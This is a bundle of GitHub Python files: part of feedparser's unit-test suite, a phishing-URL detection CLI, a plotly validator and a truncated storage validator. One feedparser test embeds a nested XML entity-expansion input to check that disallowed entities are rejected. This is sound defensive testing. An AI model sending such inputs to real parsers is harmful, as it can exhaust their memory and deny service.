"Test the sgmllib-based parser by manipulating feedparser " \
"into believing no XML parsers are installed"
def __init__(self, arg):
unittest.TestCase.__init__(self, arg)
self._xml_available = feedparser._XML_AVAILABLE
def setUp(self):
feedparser._XML_AVAILABLE = 0
def tearDown(self):
feedparser._XML_AVAILABLE = self._xml_available
class TestStrictParser(BaseTestCase):
pass
class TestMicroformats(BaseTestCase):
pass
class TestEncodings(BaseTestCase):
def test_doctype_replacement(self):
"Ensure that non-ASCII-compatible encodings don't hide " \
"disallowed ENTITY declarations"
doc = """<?xml version="1.0" encoding="utf-16be"?>
<!DOCTYPE feed [
<!ENTITY exponential1 "bogus ">
<!ENTITY exponential2 "&exponential1;&exponential1;">
<!ENTITY exponential3 "&exponential2;&exponential2;">
]>
<feed><title type="html">&exponential3;</title></feed>"""
doc = codecs.BOM_UTF16_BE + doc.encode('utf-16be')
result = feedparser.parse(doc)
self.assertEqual(result['feed']['title'], u'&exponential3')
def test_gb2312_converted_to_gb18030_in_xml_encoding(self):
# \u55de was chosen because it exists in gb18030 but not gb2312
feed = u'''<?xml version="1.0" encoding="gb2312"?>
<feed><title>\u55de</title></feed>'''
result = feedparser.parse(feed.encode('gb18030'), response_headers={
'Content-Type': 'text/xml'
})
self.assertEqual(result.encoding, 'gb18030')
class TestFeedParserDict(unittest.TestCase):
"Ensure that FeedParserDict returns values as expected and won't crash"
def setUp(self):
self.d = feedparser.FeedParserDict()
def _check_key(self, k):
self.assertTrue(k in self.d)
self.assertTrue(hasattr(self.d, k))
self.assertEqual(self.d[k], 1)
self.assertEqual(getattr(self.d, k), 1)
def _check_no_key(self, k):
self.assertTrue(k not in self.d)
self.assertTrue(not hasattr(self.d, k))
def test_empty(self):
keys = (
'a','entries', 'id', 'guid', 'summary', 'subtitle', 'description',
'category', 'enclosures', 'license', 'categories',
)
for k in keys:
self._check_no_key(k)
self.assertTrue('items' not in self.d)
self.assertTrue(hasattr(self.d, 'items')) # dict.items() exists
def test_neutral(self):
self.d['a'] = 1
self._check_key('a')
def test_single_mapping_target_1(self):
self.d['id'] = 1
self._check_key('id')
self._check_key('guid')
def test_single_mapping_target_2(self):
self.d['guid'] = 1
self._check_key('id')
self._check_key('guid')
def test_multiple_mapping_target_1(self):
self.d['summary'] = 1
self._check_key('summary')
self._check_key('description')
def test_multiple_mapping_target_2(self):
self.d['subtitle'] = 1
self._check_key('subtitle')
self._check_key('description')
def test_multiple_mapping_mapped_key(self):
self.d['description'] = 1
self._check_key('summary')
self._check_key('description')
def test_license(self):
self.d['links'] = []
try:
self.d['license']
self.assertTrue(False)
except KeyError:
pass
self.d['links'].append({'rel': 'license'})
try:
self.d['license']
self.assertTrue(False)
except KeyError:
pass
self.d['links'].append({'rel': 'license', 'href': 'http://dom.test/'})
self.assertEqual(self.d['license'], 'http://dom.test/')
def test_category(self):
self.d['tags'] = []
try:
self.d['category']
self.assertTrue(False)
except KeyError:
pass
self.d['tags'] = [{}]
try:
self.d['category']
self.assertTrue(False)
except KeyError:
pass
self.d['tags'] = [{'term': 'cat'}]
self.assertEqual(self.d['category'], 'cat')
self.d['tags'].append({'term': 'dog'})
self.assertEqual(self.d['category'], 'cat')
class TestOpenResource(unittest.TestCase):
"Ensure that `_open_resource()` interprets its arguments as URIs, " \
"file-like objects, or in-memory feeds as expected"
def test_fileobj(self):
r = feedparser._open_resource(sys.stdin, '', '', '', '', [], {})
self.assertTrue(r is sys.stdin)
def test_feed(self):
f = feedparser.parse(u'feed://localhost:8097/tests/http/target.xml')
self.assertEqual(f.href, u'http://localhost:8097/tests/http/target.xml')
def test_feed_http(self):
f = feedparser.parse(u'feed:http://localhost:8097/tests/http/target.xml')
self.assertEqual(f.href, u'http://localhost:8097/tests/http/target.xml')
def test_bytes(self):
s = '<feed><item><title>text</title></item></feed>'.encode('utf-8')
r = feedparser._open_resource(s, '', '', '', '', [], {})
self.assertEqual(s, r.read())
def test_string(self):
s = '<feed><item><title>text</title></item></feed>'
r = feedparser._open_resource(s, '', '', '', '', [], {})
self.assertEqual(s.encode('utf-8'), r.read())
def test_unicode_1(self):
s = u'<feed><item><title>text</title></item></feed>'
r = feedparser._open_resource(s, '', '', '', '', [], {})
self.assertEqual(s.encode('utf-8'), r.read())
def test_unicode_2(self):
s = u'<feed><item><title>t\u00e9xt</title></item></feed>'
r = feedparser._open_resource(s, '', '', '', '', [], {})
self.assertEqual(s.encode('utf-8'), r.read())
class TestMakeSafeAbsoluteURI(unittest.TestCase):
"Exercise the URI joining and sanitization code"
base = u'http://d.test/d/f.ext'
def _mktest(rel, expect, doc):
def fn(self):
value = feedparser._makeSafeAbsoluteURI(self.base, rel)
self.assertEqual(value, expect)
fn.__doc__ = doc
return fn
# make the test cases; the call signature is:
# (relative_url, expected_return_value, test_doc_string)
test_abs = _mktest(u'https://s.test/', u'https://s.test/', 'absolute uri')
test_rel = _mktest(u'/new', u'http://d.test/new', 'relative uri')
test_bad = _mktest(u'x://bad.test/', u'', 'unacceptable uri protocol')
test_mag = _mktest(u'magnet:?xt=a', u'magnet:?xt=a', 'magnet uri')
def test_catch_ValueError(self):
'catch ValueError in Python 2.7 and up'
uri = u'http://bad]test/'
value1 = feedparser._makeSafeAbsoluteURI(uri)
value2 = feedparser._makeSafeAbsoluteURI(self.base, uri)
swap = feedparser.ACCEPTABLE_URI_SCHEMES
feedparser.ACCEPTABLE_URI_SCHEMES = ()
value3 = feedparser._makeSafeAbsoluteURI(self.base, uri)
feedparser.ACCEPTABLE_URI_SCHEMES = swap
# Only Python 2.7 and up throw a ValueError, otherwise uri is returned
self.assertTrue(value1 in (uri, u''))
self.assertTrue(value2 in (uri, u''))
self.assertTrue(value3 in (uri, u''))
class TestConvertToIdn(unittest.TestCase):
"Test IDN support (unavailable in Jython as of Jython 2.5.2)"
# this is the greek test domain
hostname = u'\u03c0\u03b1\u03c1\u03ac\u03b4\u03b5\u03b9\u03b3\u03bc\u03b1'
hostname += u'.\u03b4\u03bf\u03ba\u03b9\u03bc\u03ae'
def test_control(self):
r = feedparser._convert_to_idn(u'http://example.test/')
self.assertEqual(r, u'http://example.test/')
def test_idn(self):
r = feedparser._convert_to_idn(u'http://%s/' % (self.hostname,))
self.assertEqual(r, u'http://xn--hxajbheg2az3al.xn--jxalpdlp/')
def test_port(self):
r = feedparser._convert_to_idn(u'http://%s:8080/' % (self.hostname,))
self.assertEqual(r, u'http://xn--hxajbheg2az3al.xn--jxalpdlp:8080/')
class TestCompression(unittest.TestCase):
"Test the gzip and deflate support in the HTTP code"
def test_gzip_good(self):
f = feedparser.parse('http://localhost:8097/tests/compression/gzip.gz')
self.assertEqual(f.version, 'atom10')
def test_gzip_not_compressed(self):
f = feedparser.parse('http://localhost:8097/tests/compression/gzip-not-compressed.gz')
self.assertEqual(f.bozo, 1)
self.assertTrue(isinstance(f.bozo_exception, IOError))
self.assertEqual(f['feed']['title'], 'gzip')
def test_gzip_struct_error(self):
f = feedparser.parse('http://localhost:8097/tests/compression/gzip-struct-error.gz')
self.assertEqual(f.bozo, 1)
self.assertTrue(isinstance(f.bozo_exception, struct.error))
def test_zlib_good(self):
f = feedparser.parse('http://localhost:8097/tests/compression/deflate.z')
self.assertEqual(f.version, 'atom10')
def test_zlib_no_headers(self):
f = feedparser.parse('http://localhost:8097/tests/compression/deflate-no-headers.z')
self.assertEqual(f.version, 'atom10')
def test_zlib_not_compressed(self):
f = feedparser.parse('http://localhost:8097/tests/compression/deflate-not-compressed.z')
self.assertEqual(f.bozo, 1)
self.assertTrue(isinstance(f.bozo_exception, zlib.error))
self.assertEqual(f['feed']['title'], 'deflate')
class TestHTTPStatus(unittest.TestCase):
"Test HTTP redirection and other status codes"
def test_301(self):
f = feedparser.parse('http://localhost:8097/tests/http/http_status_301.xml')
self.assertEqual(f.status, 301)
self.assertEqual(f.href, 'http://localhost:8097/tests/http/target.xml')
self.assertEqual(f.entries[0].title, 'target')
def test_302(self):
f = feedparser.parse('http://localhost:8097/tests/http/http_status_302.xml')
self.assertEqual(f.status, 302)
self.assertEqual(f.href, 'http://localhost:8097/tests/http/target.xml')
self.assertEqual(f.entries[0].title, 'target')
def test_303(self):
f = feedparser.parse('http://localhost:8097/tests/http/http_status_303.xml')
self.assertEqual(f.status, 303)
self.assertEqual(f.href, 'http://localhost:8097/tests/http/target.xml')
self.assertEqual(f.entries[0].title, 'target')
def test_307(self):
f = feedparser.parse('http://localhost:8097/tests/http/http_status_307.xml')
self.assertEqual(f.status, 307)
self.assertEqual(f.href, 'http://localhost:8097/tests/http/target.xml')
self.assertEqual(f.entries[0].title, 'target')
def test_304(self):
# first retrieve the url
u = 'http://localhost:8097/tests/http/http_status_304.xml'
f = feedparser.parse(u)
self.assertEqual(f.status, 200)
self.assertEqual(f.entries[0].title, 'title 304')
# extract the etag and last-modified headers
e = [v for k, v in f.headers.items() if k.lower() == 'etag'][0]
mh = [v for k, v in f.headers.items() if k.lower() == 'last-modified'][0]
ms = f.updated
mt = f.updated_parsed
md = datetime.datetime(*mt[0:7])
self.assertTrue(isinstance(mh, basestring))
self.assertTrue(isinstance(ms, basestring))
self.assertTrue(isinstance(mt, time.struct_time))
self.assertTrue(isinstance(md, datetime.datetime))
# test that sending back the etag results in a 304
f = feedparser.parse(u, etag=e)
self.assertEqual(f.status, 304)
# test that sending back last-modified (string) results in a 304
f = feedparser.parse(u, modified=ms)
self.assertEqual(f.status, 304)
# test that sending back last-modified (9-tuple) results in a 304
f = feedparser.parse(u, modified=mt)
self.assertEqual(f.status, 304)
# test that sending back last-modified (datetime) results in a 304
f = feedparser.parse(u, modified=md)
self.assertEqual(f.status, 304)
def test_404(self):
f = feedparser.parse('http://localhost:8097/tests/http/http_status_404.xml')
self.assertEqual(f.status, 404)
def test_9001(self):
f = feedparser.parse('http://localhost:8097/tests/http/http_status_9001.xml')
self.assertEqual(f.bozo, 1)
def test_redirect_to_304(self):
# ensure that an http redirect to an http 304 doesn't
# trigger a bozo_exception
u = 'http://localhost:8097/tests/http/http_redirect_to_304.xml'
f = feedparser.parse(u)
self.assertTrue(f.bozo == 0)
self.assertTrue(f.status == 302)
class TestDateParsers(unittest.TestCase):
"Test the various date parsers; most of the test cases are constructed " \
"dynamically based on the contents of the `date_tests` dict, below"
def test_None(self):
self.assertTrue(feedparser._parse_date(None) is None)
def _check_date(self, func, dtstring, dttuple):
try:
tup = func(dtstring)
except (OverflowError, ValueError):
tup = None
self.assertEqual(tup, dttuple)
self.assertEqual(tup, feedparser._parse_date(dtstring))
def test_year_10000_date(self):
# On some systems this date string will trigger an OverflowError.
# On Jython and x64 systems, however, it's interpreted just fine.
try:
date = feedparser._parse_date_rfc822(u'Sun, 31 Dec 9999 23:59:59 -9999')
except OverflowError:
date = None
self.assertTrue(date in (None, (10000, 1, 5, 4, 38, 59, 2, 5, 0)))
date_tests = {
feedparser._parse_date_greek: (
(u'', None), # empty string
(u'\u039a\u03c5\u03c1, 11 \u0399\u03bf\u03cd\u03bb 2004 12:00:00 EST', (2004, 7, 11, 17, 0, 0, 6, 193, 0)),
),
feedparser._parse_date_hungarian: (
(u'', None), # empty string
(u'2004-j\u00falius-13T9:15-05:00', (2004, 7, 13, 14, 15, 0, 1, 195, 0)),
),
feedparser._parse_date_iso8601: (
(u'', None), # empty string
(u'-0312', (2003, 12, 1, 0, 0, 0, 0, 335, 0)), # 2-digit year/month only variant
(u'031231', (2003, 12, 31, 0, 0, 0, 2, 365, 0)), # 2-digit year/month/day only, no hyphens
(u'03-12-31', (2003, 12, 31, 0, 0, 0, 2, 365, 0)), # 2-digit year/month/day only
(u'-03-12', (2003, 12, 1, 0, 0, 0, 0, 335, 0)), # 2-digit year/month only
(u'03335', (2003, 12, 1, 0, 0, 0, 0, 335, 0)), # 2-digit year/ordinal, no hyphens
(u'2003-12-31T10:14:55.1234Z', (2003, 12, 31, 10, 14, 55, 2, 365, 0)), # fractional seconds
# Special case for Google's extra zero in the month
(u'2003-012-31T10:14:55+00:00', (2003, 12, 31, 10, 14, 55, 2, 365, 0)),
),
feedparser._parse_date_nate: (
(u'', None), # empty string
(u'2004-05-25 \uc624\ud6c4 11:23:17', (2004, 5, 25, 14, 23, 17, 1, 146, 0)),
),
feedparser._parse_date_onblog: (
(u'', None), # empty string
(u'2004\ub144 05\uc6d4 28\uc77c 01:31:15', (2004, 5, 27, 16, 31, 15, 3, 148, 0)),
),
feedparser._parse_date_perforce: (
(u'', None), # empty string
(u'Fri, 2006/09/15 08:19:53 EDT', (2006, 9, 15, 12, 19, 53, 4, 258, 0)),
),
feedparser._parse_date_rfc822: (
(u'', None), # empty string
(u'Thu, 01 Jan 0100 00:00:01 +0100', (99, 12, 31, 23, 0, 1, 3, 365, 0)), # ancient date
(u'Thu, 01 Jan 04 19:48:21 GMT', (2004, 1, 1, 19, 48, 21, 3, 1, 0)), # 2-digit year
(u'Thu, 01 Jan 2004 19:48:21 GMT', (2004, 1, 1, 19, 48, 21, 3, 1, 0)), # 4-digit year
(u'Thu, 5 Apr 2012 10:00:00 GMT', (2012, 4, 5, 10, 0, 0, 3, 96, 0)), # 1-digit day
(u'Wed, 19 Aug 2009 18:28:00 Etc/GMT', (2009, 8, 19, 18, 28, 0, 2, 231, 0)), # etc/gmt timezone
(u'Wed, 19 Feb 2012 22:40:00 GMT-01:01', (2012, 2, 19, 23, 41, 0, 6, 50, 0)), # gmt+hh:mm timezone
(u'Mon, 13 Feb, 2012 06:28:00 UTC', (2012, 2, 13, 6, 28, 0, 0, 44, 0)), # extraneous comma
(u'Thu, 01 Jan 2004 00:00 GMT', (2004, 1, 1, 0, 0, 0, 3, 1, 0)), # no seconds
(u'Thu, 01 Jan 2004', (2004, 1, 1, 0, 0, 0, 3, 1, 0)), # no time
# Additional tests to handle Disney's long month names and invalid timezones
(u'Mon, 26 January 2004 16:31:00 AT', (2004, 1, 26, 20, 31, 0, 0, 26, 0)),
(u'Mon, 26 January 2004 16:31:00 ET', (2004, 1, 26, 21, 31, 0, 0, 26, 0)),
(u'Mon, 26 January 2004 16:31:00 CT', (2004, 1, 26, 22, 31, 0, 0, 26, 0)),
(u'Mon, 26 January 2004 16:31:00 MT', (2004, 1, 26, 23, 31, 0, 0, 26, 0)),
(u'Mon, 26 January 2004 16:31:00 PT', (2004, 1, 27, 0, 31, 0, 1, 27, 0)),
),
feedparser._parse_date_rfc822_grubby: (
(u'Thu Aug 30 2012 17:26:16 +0200', (2012, 8, 30, 15, 26, 16, 3, 243, 0)),
),
feedparser._parse_date_asctime: (
(u'Sun Jan 4 16:29:06 2004', (2004, 1, 4, 16, 29, 6, 6, 4, 0)),
),
feedparser._parse_date_w3dtf: (
(u'', None), # empty string
(u'2003-12-31T10:14:55Z', (2003, 12, 31, 10, 14, 55, 2, 365, 0)), # UTC
(u'2003-12-31T10:14:55-08:00', (2003, 12, 31, 18, 14, 55, 2, 365, 0)), # San Francisco timezone
(u'2003-12-31T18:14:55+08:00', (2003, 12, 31, 10, 14, 55, 2, 365, 0)), # Tokyo timezone
(u'2007-04-23T23:25:47.538+10:00', (2007, 4, 23, 13, 25, 47, 0, 113, 0)), # fractional seconds
(u'2003-12-31', (2003, 12, 31, 0, 0, 0, 2, 365, 0)), # year/month/day only
(u'20031231', (2003, 12, 31, 0, 0, 0, 2, 365, 0)), # year/month/day only, no hyphens
(u'2003-12', (2003, 12, 1, 0, 0, 0, 0, 335, 0)), # year/month only
(u'2003', (2003, 1, 1, 0, 0, 0, 2, 1, 0)), # year only
# MSSQL-style dates
(u'2004-07-08 23:56:58 -00:20', (2004, 7, 9, 0, 16, 58, 4, 191, 0)), # with timezone
(u'2004-07-08 23:56:58', (2004, 7, 8, 23, 56, 58, 3, 190, 0)), # without timezone
(u'2004-07-08 23:56:58.0', (2004, 7, 8, 23, 56, 58, 3, 190, 0)), # with fractional second
# Special cases for out-of-range times
(u'2003-12-31T25:14:55Z', (2004, 1, 1, 1, 14, 55, 3, 1, 0)), # invalid (25 hours)
(u'2003-12-31T10:61:55Z', (2003, 12, 31, 11, 1, 55, 2, 365, 0)), # invalid (61 minutes)
(u'2003-12-31T10:14:61Z', (2003, 12, 31, 10, 15, 1, 2, 365, 0)), # invalid (61 seconds)
# Special cases for rollovers in leap years
(u'2004-02-28T18:14:55-08:00', (2004, 2, 29, 2, 14, 55, 6, 60, 0)), # feb 28 in leap year
(u'2003-02-28T18:14:55-08:00', (2003, 3, 1, 2, 14, 55, 5, 60, 0)), # feb 28 in non-leap year
(u'2000-02-28T18:14:55-08:00', (2000, 2, 29, 2, 14, 55, 1, 60, 0)), # feb 28 in leap year on century divisible by 400
)
}
def make_date_test(f, s, t):
return lambda self: self._check_date(f, s, t)
for func, items in date_tests.iteritems():
for i, (dtstring, dttuple) in enumerate(items):
uniqfunc = make_date_test(func, dtstring, dttuple)
setattr(TestDateParsers, 'test_%s_%02i' % (func.__name__, i), uniqfunc)
class TestHTMLGuessing(unittest.TestCase):
"Exercise the HTML sniffing code"
def _mktest(text, expect, doc):
def fn(self):
value = bool(feedparser._FeedParserMixin.lookslikehtml(text))
self.assertEqual(value, expect)
fn.__doc__ = doc
return fn
test_text_1 = _mktest(u'plain text', False, u'plain text')
test_text_2 = _mktest(u'2 < 3', False, u'plain text with angle bracket')
test_html_1 = _mktest(u'<a href="">a</a>', True, u'anchor tag')
test_html_2 = _mktest(u'<i>i</i>', True, u'italics tag')
test_html_3 = _mktest(u'<b>b</b>', True, u'bold tag')
test_html_4 = _mktest(u'<code>', False, u'allowed tag, no end tag')
test_html_5 = _mktest(u'<rss> .. </rss>', False, u'disallowed tag')
test_entity_1 = _mktest(u'AT&T', False, u'corporation name')
test_entity_2 = _mktest(u'©', True, u'named entity reference')
test_entity_3 = _mktest(u'©', True, u'numeric entity reference')
test_entity_4 = _mktest(u'©', True, u'hex numeric entity reference')
#---------- additional api unit tests, not backed by files
class TestBuildRequest(unittest.TestCase):
"Test that HTTP request objects are created as expected"
def test_extra_headers(self):
"""You can pass in extra headers and they go into the request object."""
request = feedparser._build_urllib2_request(
'http://example.com/feed',
'agent-name',
None, None, None, None,
{'Cache-Control': 'max-age=0'})
# nb, urllib2 folds the case of the headers
self.assertEqual(
request.get_header('Cache-control'), 'max-age=0')
class TestLxmlBug(unittest.TestCase):
def test_lxml_etree_bug(self):
try:
import lxml.etree
except ImportError:
pass
else:
doc = u"<feed>&illformed_charref</feed>".encode('utf8')
# Importing lxml.etree currently causes libxml2 to
# throw SAXException instead of SAXParseException.
feedparser.parse(feedparser._StringIO(doc))
self.assertTrue(True)
#---------- parse test files and create test methods ----------
def convert_to_utf8(data):
"Identify data's encoding using its byte order mark" \
"and convert it to its utf-8 equivalent"
if data[:4] == _l2bytes([0x4c, 0x6f, 0xa7, 0x94]):
return data.decode('cp037').encode('utf-8')
elif data[:4] == _l2bytes([0x00, 0x00, 0xfe, 0xff]):
if not _UTF32_AVAILABLE:
return None
return data.decode('utf-32be').encode('utf-8')
elif data[:4] == _l2bytes([0xff, 0xfe, 0x00, 0x00]):
if not _UTF32_AVAILABLE:
return None
return data.decode('utf-32le').encode('utf-8')
elif data[:4] == _l2bytes([0x00, 0x00, 0x00, 0x3c]):
if not _UTF32_AVAILABLE:
return None
return data.decode('utf-32be').encode('utf-8')
elif data[:4] == _l2bytes([0x3c, 0x00, 0x00, 0x00]):
if not _UTF32_AVAILABLE:
return None
return data.decode('utf-32le').encode('utf-8')
elif data[:4] == _l2bytes([0x00, 0x3c, 0x00, 0x3f]):
return data.decode('utf-16be').encode('utf-8')
elif data[:4] == _l2bytes([0x3c, 0x00, 0x3f, 0x00]):
return data.decode('utf-16le').encode('utf-8')
elif (data[:2] == _l2bytes([0xfe, 0xff])) and (data[2:4] != _l2bytes([0x00, 0x00])):
return data[2:].decode('utf-16be').encode('utf-8')
elif (data[:2] == _l2bytes([0xff, 0xfe])) and (data[2:4] != _l2bytes([0x00, 0x00])):
return data[2:].decode('utf-16le').encode('utf-8')
elif data[:3] == _l2bytes([0xef, 0xbb, 0xbf]):
return data[3:]
# no byte order mark was found
return data
skip_re = re.compile(_s2bytes("SkipUnless:\s*(.*?)\n"))
desc_re = re.compile(_s2bytes("Description:\s*(.*?)\s*Expect:\s*(.*)\s*-->"))
def getDescription(xmlfile, data):
"""Extract test data
Each test case is an XML file which contains not only a test feed
but also the description of the test and the condition that we
would expect the parser to create when it parses the feed. Example:
<!--
Description: feed title
Expect: feed['title'] == u'Example feed'
-->
"""
skip_results = skip_re.search(data)
if skip_results:
skipUnless = skip_results.group(1).strip()
else:
skipUnless = '1'
search_results = desc_re.search(data)
if not search_results:
raise RuntimeError, "can't parse %s" % xmlfile
description, evalString = map(lambda s: s.strip(), list(search_results.groups()))
description = xmlfile + ": " + unicode(description, 'utf8')
return description, evalString, skipUnless
def buildTestCase(xmlfile, description, evalString):
func = lambda self, xmlfile=xmlfile, evalString=evalString: \
self.failUnlessEval(xmlfile, evalString)
func.__doc__ = description
return func
def runtests():
"Read the files in the tests/ directory, dynamically add tests to the " \
"TestCases above, spawn the HTTP server, and run the test suite"
if sys.argv[1:]:
allfiles = filter(lambda s: s.endswith('.xml'), reduce(operator.add, map(glob.glob, sys.argv[1:]), []))
sys.argv = [sys.argv[0]] #+ sys.argv[2:]
else:
allfiles = glob.glob(os.path.join('.', 'tests', '**', '**', '*.xml'))
wellformedfiles = glob.glob(os.path.join('.', 'tests', 'wellformed', '**', '*.xml'))
illformedfiles = glob.glob(os.path.join('.', 'tests', 'illformed', '*.xml'))
encodingfiles = glob.glob(os.path.join('.', 'tests', 'encoding', '*.xml'))
entitiesfiles = glob.glob(os.path.join('.', 'tests', 'entities', '*.xml'))
microformatfiles = glob.glob(os.path.join('.', 'tests', 'microformats', '**', '*.xml'))
httpd = None
# there are several compression test cases that must be accounted for
# as well as a number of http status tests that redirect to a target
# and a few `_open_resource`-related tests
httpcount = 6 + 17 + 2
httpcount += len([f for f in allfiles if 'http' in f])
httpcount += len([f for f in wellformedfiles if 'http' in f])
httpcount += len([f for f in illformedfiles if 'http' in f])
httpcount += len([f for f in encodingfiles if 'http' in f])
try:
for c, xmlfile in enumerate(allfiles + encodingfiles + illformedfiles + entitiesfiles):
addTo = TestCase
if xmlfile in encodingfiles:
addTo = TestEncodings
elif xmlfile in entitiesfiles:
addTo = (TestStrictParser, TestLooseParser)
elif xmlfile in microformatfiles:
addTo = TestMicroformats
elif xmlfile in wellformedfiles:
addTo = (TestStrictParser, TestLooseParser)
data = open(xmlfile, 'rb').read()
if 'encoding' in xmlfile:
data = convert_to_utf8(data)
if data is None:
# convert_to_utf8 found a byte order mark for utf_32
# but it's not supported in this installation of Python
if 'http' in xmlfile:
httpcount -= 1 + (xmlfile in wellformedfiles)
continue
description, evalString, skipUnless = getDescription(xmlfile, data)
testName = 'test_%06d' % c
ishttp = 'http' in xmlfile
try:
if not eval(skipUnless): raise NotImplementedError
except (ImportError, LookupError, NotImplementedError, AttributeError):
if ishttp:
httpcount -= 1 + (xmlfile in wellformedfiles)
continue
if ishttp:
xmlfile = 'http://%s:%s/%s' % (_HOST, _PORT, posixpath.normpath(xmlfile.replace('\\', '/')))
testFunc = buildTestCase(xmlfile, description, evalString)
if isinstance(addTo, tuple):
setattr(addTo[0], testName, testFunc)
setattr(addTo[1], testName, testFunc)
else:
setattr(addTo, testName, testFunc)
if feedparser.TIDY_MARKUP and feedparser._mxtidy:
sys.stderr.write('\nWarning: feedparser.TIDY_MARKUP invalidates tests, turning it off temporarily\n\n')
feedparser.TIDY_MARKUP = 0
if httpcount:
httpd = FeedParserTestServer(httpcount)
httpd.daemon = True
httpd.start()
httpd.ready.wait()
testsuite = unittest.TestSuite()
testloader = unittest.TestLoader()
testsuite.addTest(testloader.loadTestsFromTestCase(TestCase))
testsuite.addTest(testloader.loadTestsFromTestCase(TestStrictParser))
testsuite.addTest(testloader.loadTestsFromTestCase(TestLooseParser))
testsuite.addTest(testloader.loadTestsFromTestCase(TestEncodings))
testsuite.addTest(testloader.loadTestsFromTestCase(TestDateParsers))
testsuite.addTest(testloader.loadTestsFromTestCase(TestHTMLGuessing))
testsuite.addTest(testloader.loadTestsFromTestCase(TestHTTPStatus))
testsuite.addTest(testloader.loadTestsFromTestCase(TestCompression))
testsuite.addTest(testloader.loadTestsFromTestCase(TestConvertToIdn))
testsuite.addTest(testloader.loadTestsFromTestCase(TestMicroformats))
testsuite.addTest(testloader.loadTestsFromTestCase(TestOpenResource))
testsuite.addTest(testloader.loadTestsFromTestCase(TestFeedParserDict))
testsuite.addTest(testloader.loadTestsFromTestCase(TestMakeSafeAbsoluteURI))
testsuite.addTest(testloader.loadTestsFromTestCase(TestEverythingIsUnicode))
testsuite.addTest(testloader.loadTestsFromTestCase(TestTemporaryFallbackBehavior))
testsuite.addTest(testloader.loadTestsFromTestCase(TestLxmlBug))
testresults = unittest.TextTestRunner(verbosity=1).run(testsuite)
# Return 0 if successful, 1 if there was a failure
sys.exit(not testresults.wasSuccessful())
finally:
if httpd:
if httpd.requests:
# Should never get here unless something went horribly wrong, like the
# user hitting Ctrl-C. Tell our HTTP server that it's done, then do
# one more request to flush it. This rarely works; the combination of
# threading, self-terminating HTTP servers, and unittest is really
# quite flaky. Just what you want in a testing framework, no?
httpd.requests = 0
if httpd.ready:
urllib.urlopen('http://127.0.0.1:8097/tests/wellformed/rss/aaa_wellformed.xml').read()
httpd.join(0)
if __name__ == "__main__":
runtests()
|
{
"content_hash": "01ee1b7f93f30ebe3c06354f3a2fc160",
"timestamp": "",
"source": "github",
"line_count": 857,
"max_line_length": 137,
"avg_line_length": 45.85180863477246,
"alnum_prop": 0.611757221020486,
"repo_name": "milkey-mouse/SongRater",
"id": "aadcf79df084e5baa0b2f293c45a75c3e28befc6",
"size": "39318",
"binary": false,
"copies": "14",
"ref": "refs/heads/master",
"path": "feedparser/feedparsertest.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "106976"
},
{
"name": "CSS",
"bytes": "17968"
},
{
"name": "HTML",
"bytes": "2732"
},
{
"name": "JavaScript",
"bytes": "301526"
},
{
"name": "Python",
"bytes": "540815"
},
{
"name": "Shell",
"bytes": "31"
}
],
"symlink_target": ""
}
|
import sys, getopt
from integrate import integrate
########
# Usage
# python phishing_detection.py -s [string] -f [file]
########
DEFAULT_URL = "https://www.naver.com/"
def call_integrate(url):
try:
return integrate(url)
except:
print("Error(001): integrate() failed")
def call_integrate_for_file(input_file_path, output_file_path):
with open(input_file_path, "r") as input_file:
with open(output_file_path, "w") as output_file: # this causes error when calling from a different path
# write header
output_file.write("url,verdict\n")
# call integrate for each url
urls = input_file.readlines()
for url in urls:
url = url.rstrip()
result = call_integrate(url)
output_file.write(url + "," + result + "\n")
output_file.close()
input_file.close()
def main(argv):
url = DEFAULT_URL
has_infile = False
has_outfile = False
input_file_path = "files/urls.csv"
output_file_path = "files/results.csv"
try:
opts, args = getopt.getopt(argv, "hs:i:o:", ["help", "string=", "infile=", "outfile="])
except getopt.GetoptError:
print("Error(000): invalid options")
print("phishing_detection.py -s <string> -i <input_file> -o <output_file>")
return
if (not opts):
print("Running script on default url.")
call_integrate(url)
else:
for opt, arg in opts:
if opt in ("-h", "--help"):
print("phishing_detection.py -s <string> -i <input_file> -o <output_file>")
return
elif opt in ("-s", "--string"):
url = arg
call_integrate(url)
elif opt in ("-i", "--infile"):
has_infile = True
input_file_path = arg
elif opt in ("-o", "--outfile"):
has_outfile = True
output_file_path = arg
if (has_outfile and not has_infile):
print("Error(002): requires input_file")
if (has_infile):
call_integrate_for_file(input_file_path, output_file_path)
if __name__ == "__main__":
print("===============Starting phishing_detection.py===============")
main(sys.argv[1:])
print("===============Finishing phishing_detection.py==============")
|
{
"content_hash": "aa906e30ebe6328fa3b878864a7f39f0",
"timestamp": "",
"source": "github",
"line_count": 72,
"max_line_length": 112,
"avg_line_length": 33.27777777777778,
"alnum_prop": 0.5321368948247078,
"repo_name": "jaeyung1001/phishing_site_detection",
"id": "6b0d7ffc44f2247417cb5c931772bd9b4db15999",
"size": "2396",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "phishing_detection/phishing_detection.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "35309"
}
],
"symlink_target": ""
}
|
import _plotly_utils.basevalidators
class ArrayminussrcValidator(_plotly_utils.basevalidators.SrcValidator):
def __init__(
self, plotly_name="arrayminussrc", parent_name="scatter3d.error_x", **kwargs
):
super(ArrayminussrcValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "none"),
role=kwargs.pop("role", "info"),
**kwargs
)
|
{
"content_hash": "a15c12f057460d959cfa9c38b81d476b",
"timestamp": "",
"source": "github",
"line_count": 14,
"max_line_length": 84,
"avg_line_length": 34.285714285714285,
"alnum_prop": 0.60625,
"repo_name": "plotly/python-api",
"id": "159dbff9da6e6b6045949b5665d44cb22359731b",
"size": "480",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "packages/python/plotly/plotly/validators/scatter3d/error_x/_arrayminussrc.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "JavaScript",
"bytes": "6870"
},
{
"name": "Makefile",
"bytes": "1708"
},
{
"name": "Python",
"bytes": "823245"
},
{
"name": "Shell",
"bytes": "3238"
}
],
"symlink_target": ""
}
|
from calyptos.plugins.validator.validatorplugin import ValidatorPlugin
class Storage(ValidatorPlugin):
def validate(self):
self.topology = self.environment['default_attributes']['eucalyptus']['topology']
if 'system-properties' in self.environment['default_attributes']['eucalyptus']:
self.systemproperties = self.environment['default_attributes']['eucalyptus']['system-properties']
for name in self.topology['clusters'].keys():
if 'storage-backend' in self.topology['clusters'][name]:
